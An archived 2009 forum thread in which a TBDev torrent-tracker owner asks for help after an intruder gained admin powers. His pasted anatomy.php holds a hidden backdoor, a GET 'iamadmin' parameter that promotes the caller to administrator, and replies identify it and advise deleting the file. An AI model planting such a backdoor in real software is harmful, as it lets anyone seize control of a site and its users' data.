Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   TBDev (http://www.bvlist.com/forumdisplay.php?f=20)
-   -   security (http://www.bvlist.com/showthread.php?t=3100)

tunad 28th July 2009 13:26
security
 
can anyone tell me how to secure this source?
i had a tbdev source and someone make fun of me

please help

wMan 28th July 2009 16:57
what version ? moded like xzone hove old is it realy ?

sammygo 28th July 2009 17:02
Quote:
Originally Posted by wolfman (Post 13793)
what version ? moded like xzone hove old is it realy ?
I think is Xzone 100% =)) !

wMan 28th July 2009 17:05
i have secured that pice of shit but that source is reason why TBdev is still making new releases (that code suck starting from core till moding )

NetM 1.5 is pretty old, we have here available Netmaniack 1.6

tunad 28th July 2009 17:09
security
 
i have tbdev.net (netmaniack's edition) 1.5


how i can secure it???

please help

wMan 28th July 2009 17:13
Quote:
Originally Posted by tunad (Post 13796)
i have tbdev.net (netmaniack's edition) 1.5


how i can secure it???

please help
tbdev.net look for security mods
What problem exactly did you have?

sammygo 28th July 2009 17:19
Quote:
Originally Posted by wolfman (Post 13797)
tbdev.net look for security mods
Netmaniak ....hmm
Better..go and download tbdev 1-1-2008 !

wMan 28th July 2009 17:22
Quote:
Originally Posted by ionutzsami (Post 13798)
Netmaniak ....hmm
Better..go and download tbdev 1-1-2008 !
i woud say Bigjoos moded one is better :D

http://bvlist.com/codex-creations-installer-bigjoos

tunad 28th July 2009 18:13
Quote:
Originally Posted by wolfman (Post 13797)
tbdev.net look for security mods
What problem exactly did you have?

someone manage to acces functions,he create new users,write anything he want,delete users,delete torrrents

how can i prevent that?

wMan 28th July 2009 18:17
Quote:
Originally Posted by tunad (Post 13800)
someone manage to acces functions,he create new users,write anything he want,delete users,delete torrrents

how can i prevent that?
open up ur anatomy.php and copy all and paste it here :D :smack:

tunad 28th July 2009 18:45
PHP Code:
<?php

require "include/bittorrent.php";

dbconn(false);
stdhead("Torrent anatomy");
?>
<table class=main width=750 border=0 cellspacing=0 cellpadding=0><tr><td class=embedded>
<h2>Anatomy of a torrent session </h2>
<table width=100% border=1 cellspacing=0 cellpadding=10><tr><td class=text>

<em>(Updated to reflect the tracker changes. 14-04-2004)</em>


There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:

<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875 &event=started</code>

Let's dissect this:

• <b>info_hash</b> is just the hash identifying the torrent in question;
• <b>peer_id</b>, as the name suggests, identifies the client (the s588 part identifies Shad0w's 5.8.8, the rest is random);
• <b>port</b> just tells the tracker which port the client will listen to for incoming connections;
• <b>uploaded</b>=0; (this and the following are the relevant ones, and are self-explanatory)
• <b>downloaded</b>=0;
• <b>left</b>=753690875 (how much left); 
• <b>event=started</b> (telling the tracker that the client has just started).

Notice that the client IP doesn't show up here (although it can be sent by the client if it configured to do so).
It's up to the tracker to see it and associate it with the user_id.
(Server replies will be omitted, they're just lists of peer ips and respective ports.)
At this stage the user's profile will be listing this torrent as being leeched.

>From now on the client will keep send GETs to the tracker. We show only the first one as an example,


<code> GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=67960832&downloaded=40828928& left=715417851&numwant=0</code>

("numwant" is how the client tells the tracker how many new peers it wants, in this case 0.)


As you can see at this stage the user had uploaded approx. 68MB and downloaded approx. 40MB. Whenever the tracker receives
these GETs it updates both the stats relative to the 'currently leeching/seeding' boxes and the total user upload/download stats. These intermediate GETs will be sent either periodically (every 15 min
or so, depends on the client and tracker) or when you force a manual announce in the client.


Finally, when the client was closed it sent


<code> GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=754384896&downloaded=754215163 &left=0&numwant=0&event=completed</code>

Notice the all-important "event=completed". It is at this stage that the torrent will be removed from the user's profile.
If for some reason (tracker down, lost connection, bad client, crash, ...) this last GET doesn't reach
the tracker this torrent will still be seen in the user profile until some tracker timeout occurs. It should be stressed that this message will be sent only when
closing the client properly, not when the download is finished. (The tracker will start listing
a torrent as 'currently seeding' after it receives a GET with left=0). 

There's a further message that causes the torrent to be removed from the user's profile,
namely"event=stopped". This is usually sent
when stopping in the middle of a download, e.g. by pressing 'Cancel' in Shad0w's. 

One last note: some clients have a pause/resume option. This will <b>not</b> send any message to the server.
Do not use it as a way of updating stats more often, it just doesn't work. (Checked for Shad0w's 5.8.11 and ABC 2.6.5.)

</td></tr></table>
</td></tr></table>

<?
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print("Now you are one of site admins :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print("Your class now is 0 :(");
                }
stdfoot();
?>
this is my anatomy.php

wMan 28th July 2009 18:57
Quote:
Originally Posted by tunad (Post 13804)
this is my anatomy.php
ban users with white usernames and change anatomy.php with this
[php] if (eregi("anatomy.php",$_SERVER["PHP_SELF"])) die ("wtf u are trying to do bich ? fixed by wolfman");
require "include/bittorrent.php";
dbconn(false);
stdhead("Torrent anatomy");
?>

Anatomy of a torrent session



(Updated to reflect the tracker changes. 14-04-2004)



There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:



GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9% BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875 &event=started



Let's dissect this:

3v0 28th July 2009 19:01
Just remove anatomy.php it really isnt needed.

sammygo 28th July 2009 19:02
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are one of site admins :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Your class now is 0 :(");
                } 

change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                } 

tunad 28th July 2009 19:03
thank you very much!!!!!

i hope this is all i have to do.

wMan 28th July 2009 19:09
Quote:
Originally Posted by ionutzsami (Post 13808)
change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                } 
u still can hack it while shit like $_GET["iamadmin"] is in somewhere
either u remove anathomy ore change it to one without this crap

tunad 28th July 2009 19:18
so al i have to do is to delete anatomy.php ok?

wMan 28th July 2009 19:19
Quote:
Originally Posted by tunad (Post 13811)
so al i have to do is to delete anatomy.php ok?
yes

tunad 28th July 2009 19:27
i instaled the source buut now it show me in u'torrent tracker sendind invalid data ....why??

wMan 28th July 2009 19:35
Quote:
Originally Posted by tunad (Post 13813)
i instaled the source buut now it show me in u'torrent tracker sendind invalid data ....why??
because u use source that had backdoor in it
do u realy think u will get it to work ?

there is so many other good sources u know

tunad 28th July 2009 19:38
tell me please what i shoud use

Fynnon 28th July 2009 20:53
Quote:
Originally Posted by tunad (Post 13815)
tell me please what i shoud use
you could use phpMyBitTorrent or TorrentTrader or xBTiT and maybe even Codex-Creations Installer by BigJoos


All times are GMT +2. The time now is 12:06.

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.